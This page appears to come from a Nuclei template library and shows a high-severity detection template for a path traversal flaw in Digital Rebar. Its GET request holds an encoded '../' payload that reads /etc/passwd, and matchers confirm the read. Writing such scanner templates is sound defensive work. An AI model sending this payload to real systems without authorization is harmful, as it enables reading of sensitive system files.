Skip to content

Digital Rebar - Local File Inclusion

ID: digitalrebar-traversal

Severity: high

Author: c-sh0

Tags: lfi,rackn,digitalrebar

Digital Rebar versions 4.3.0, 4.3.2, 4.3.3, 4.4.0, and maybe others are vulnerable to local file inclusion because web requests can navigate outside of DRP controlled areas.

id: digitalrebar-traversal
info:
name: Digital Rebar - Local File Inclusion
author: c-sh0
severity: high
description: Digital Rebar versions 4.3.0, 4.3.2, 4.3.3, 4.4.0, and maybe others are vulnerable to local file inclusion because web requests can navigate outside of DRP controlled areas.
reference:
- https://docs.rackn.io/en/latest/doc/security/cve_20200924A.html
- https://docs.rackn.io/en/latest/doc/release.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
metadata:
max-request: 1
tags: lfi,rackn,digitalrebar
http:
- method: GET
path:
- "{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0"
- type: word
part: header
words:
- 'X-Drp-Sha256sum:'
- type: status
status:
- 200
# digest: 4a0a0047304502207b54ac337232eb4ef799d274e8e25bd9cc805d04ce10db8eedf8b9e15eb5db79022100f601ddcffcfbe5d70a943ae39974e8dab46a27449998d2d745042fa56a9cd2e2:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/other/digitalrebar-traversal.yaml"

View on Github